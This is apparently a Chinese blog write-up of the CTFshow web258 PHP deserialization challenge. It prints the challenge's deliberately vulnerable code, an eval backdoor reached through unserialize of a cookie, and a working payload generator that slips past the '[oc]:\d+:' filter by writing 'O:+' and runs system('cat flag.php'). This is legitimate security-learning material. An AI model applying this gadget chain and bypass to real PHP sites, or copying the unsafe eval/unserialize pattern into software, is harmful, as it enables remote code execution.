web258

最新推荐文章于 2024-09-13 23:32:49 发布
最新推荐文章于 2024-09-13 23:32:49 发布
阅读量155 收藏
点赞数
分类专栏: 反序化 文章标签: 前端 Powered by 金山文档
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_49893996/article/details/131498306
版权

与上一题的区别就是,在最后反序化之前做了一个正则表达式

在Cookie中过滤以o或者c开头加:加任意数字最后以:结尾的不区分大小写的字符串

O:数字:

C:数字:

class ctfShowUser{
    public $username='xxxxxx';
    public $password='xxxxxx';
    public $isVip=false;
    public $class = 'info';

    public function __construct(){
        $this->class=new info();
    }
    public function login($u,$p){
        return $this->username===$u&&$this->password===$p;
    }
    public function __destruct(){
        $this->class->getInfo();
    }

}

class info{
    public $user='xxxxxx';
    public function getInfo(){
        return $this->user;
    }
}

class backDoor{
    public $code;
    public function getInfo(){
        eval($this->code);
    }
}

$username=$_GET['username'];
$password=$_GET['password'];

if(isset($username) && isset($password)){
    if(!preg_match('/[oc]:\d+:/i', $_COOKIE['user'])){
        $user = unserialize($_COOKIE['user']);
    }
    $user->login($username,$password);
}

经过查看wp,因为序列化后是对象,以o开头,所以对原数据进行字符串替换,将o:替换为o:+

具体意义:猜测是因为:后跟数字,表示正数吧

#最终代码

class ctfShowUser{
    public $class;
    public function __construct(){
        $this->class=new backDoor();
    } 
} 
class backDoor{
    public $code='system("cat flag.php");';
}
$a = serialize(new ctfShowUser());
$a = str_replace('O:','O:+',$a);
echo urlencode($a);

关于这个,比较不容易注意到的一个点就是属性的可见性要设定为public

如果还是private私有可见的话,不会取得预想效果

陈艺秋
关注
专栏目录
CTFshow 反序列化 web258
Kradress的博客
12-19 784
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-12-02 17:44:47 # @Last Modified by: h1xa # @Last Modified time: 2020-12-02 21:38:56 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ error_reporting(0); highlight
ctfshow-web258(反序列化)
m0_62094846的博客
02-24 2961
<?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-12-02 17:44:47 # @Last Modified by: h1xa # @Last Modified time: 2020-12-02 21:38:56 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ error_reporting(0); highlight_file(__FILE__.
ctfshow反序列化
njh18790816639的博客
04-18 1130
payload(有效攻击负载)是包含在你用于一次漏洞利用(exploit)中的ShellCode中的主要功能代码 shellcode(可提权代码) 对于一个漏洞来说,ShellCode就是一个用于某个漏洞的二进制代码框架,有了这个框架你可以在这个ShellCode中包含你需要的Payload来做一些事情 exp (Exploit )漏洞利用,一般是个demo程序 poc(Proof of Concept)漏洞证明,一般就是个样本 用来证明和复现 vul:(Vulnerability) :漏洞 Pwn:是一个
CTFshow刷题日记-WEB-反序列化篇(上,254-263)
Love&Share
09-22 2916
非反序列化 web254-简单审计 这个题是搞笑的么???? 按着源码顺序走一遍 ...... $username=$_GET['username']; $password=$_GET['password']; if(isset($username) && isset($password)){ $user = new ctfShowUser(); if($user->login($username,$password)){ if($user->c
Cintel Orion Web Server v1.5 Build 258
11-03
《Cintel Orion Web Server v1.5 Build 258:深入解析与应用》 Cintel Orion Web Server v1.5 Build 258是一款专为高效、安全的Web服务设计的专业软件。作为服务器类应用的一员,它在互联网基础设施中扮演着至关...
Web网页设计制作-毕业设计期末大作业源码】(FZY258)手机英语学习网站触屏版手机wap用户登陆网站模板.zip
05-10
Web网页设计制作-毕业设计期末大作业源码 Web网页设计制作-毕业设计期末大作业源码 Web网页设计制作-毕业设计期末大作业源码 Web网页设计制作-毕业设计期末大作业源码 Web网页设计制作-毕业设计期末大作业源码 Web...
网络编程Web实验
07-06
在本实验中,我们将深入探讨网络编程中的Web技术,尤其是与Web浏览器应用程序相关的知识点。Web浏览器作为用户与互联网交互的主要接口,它的功能丰富多样,包括浏览网页、前进、后退、返回主页以及搜索等。这些功能...
信息架构 超越Web设计(第4版).pdf
03-22
技术评估 258 内容 258 启发式评估 259 内容分析 260 内容映射262 标杆法 263 用户 265 使用分析 266 搜索日志分析 267 参与者定义和招募 270 客户支持数据 270 调查 270 情景调查 270 焦点小组 271 用户研究会议 ...
ctfshow——反序列化
qq_55202378的博客
02-26 627
不要相等即可,注意GET传参时也要做修改。这里就是使用GET传输,username赋值为。变量进行反序列化,因此只需要GET传输的变量。以上一题相比,其实就是反序列化的类中的变量。,注意需要对user的值进行URL编码。,password也1赋值为。相等,且反序列化后的。
ctfshow web入门 反序列化258 为何使用:+11绕过
m0_61867082的博客
07-26 219
ctfshow web入门 反序列化258 为何使用:+11绕过
Web性能258原则
dreamship
05-18 683
所谓的“2-5-8原则”,简单说,就是当用户能够在2秒以内得到响应时,会感觉系统的响应很快; 当用户在2-5秒之间得到响应时,会感觉系统的响应速度还可以; 当用户在5-8秒以内得到响应时,会感觉系统的响应速度很慢,但是还可以接受; 而当用户在超过8秒后仍然无法得到响应时,会感觉系统糟透了,或者认为系统已经失去响应,而选择离开这个Web站点,或者发起第二次请求。 ...
CTFshow-WEB入门-反序列化
feng的博客
02-14 5571
前言 简单的反序列化直接给出payload,有意思的,较为复杂的和我不太会的会分析一波。 web254 ?username=xxxxxx&password=xxxxxx web255 <?php class ctfShowUser{ public $username='xxxxxx'; public $password='xxxxxx'; public $isVip=true; } echo urlencode(serialize(new ctfShowUser())
ctfshow web入门 反序列化
Sentiment的博客
12-26 1909
web254
-webkit-box-reflect属性与倒影效果的实现
最新发布
读心悦
09-13 464
是一个非标准的 CSS 属性,主要用于在 WebKit 浏览器(如 Chrome 和 Safari)中创建元素的倒影效果。这个属性并不是 CSS 规范的一部分,但在实践中经常被用来实现简单而有趣的视觉效果。
Vue使用query传参Boolean类型,刷新之后转换为String问题
q879936814的博客
09-12 457
要解决这个问题,不能直接Boolean处理,因为如果传入false,那么转换成字符串,Boolean(‘false’)会变成true;做项目时发现第一次进入页面时传参是正常的Boolean类型,刷新之后变成了String,这是浏览器进行的一次强制转换;解决方法:使用JSON.parse处理参数。
easyexcel模板导出并且公式自动计算的方法
weixin_47615289的博客
09-11 521
【代码】easyexcel模板导出并且公式自动计算的方法。
计算机毕业设计 基于SpringBoot的课程教学平台的设计与实现 Java+SpringBoot+Vue 前后端分离 文档报告 代码讲解 安装调试
weixin_19164791635
09-12 955
本文介绍了一款基于Java、SpringBoot和Vue.js技术的课程教学平台。该平台服务于管理员、学生和教师,提供教学资源管理、课程信息浏览、作业提交与批改等功能,旨在优化教学流程,提升教育质量,促进教育资源的数字化共享,推动教育信息化发展。
(微服务项目)新闻头条——Day1
weixin_73253843的博客
09-13 1159
(微服务项目)新闻头条——Day1
精通响应式网页设计:以实践为例
这本书的第二版由Packt Publishing于2014年11月25日出版,包含了258页的内容,主要语言是英文。书中的 ISBN-10 为1783553251,ISBN-13 为9781783553259。 本书的目标读者是新老web开发者,他们希望通过学习提升技能...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值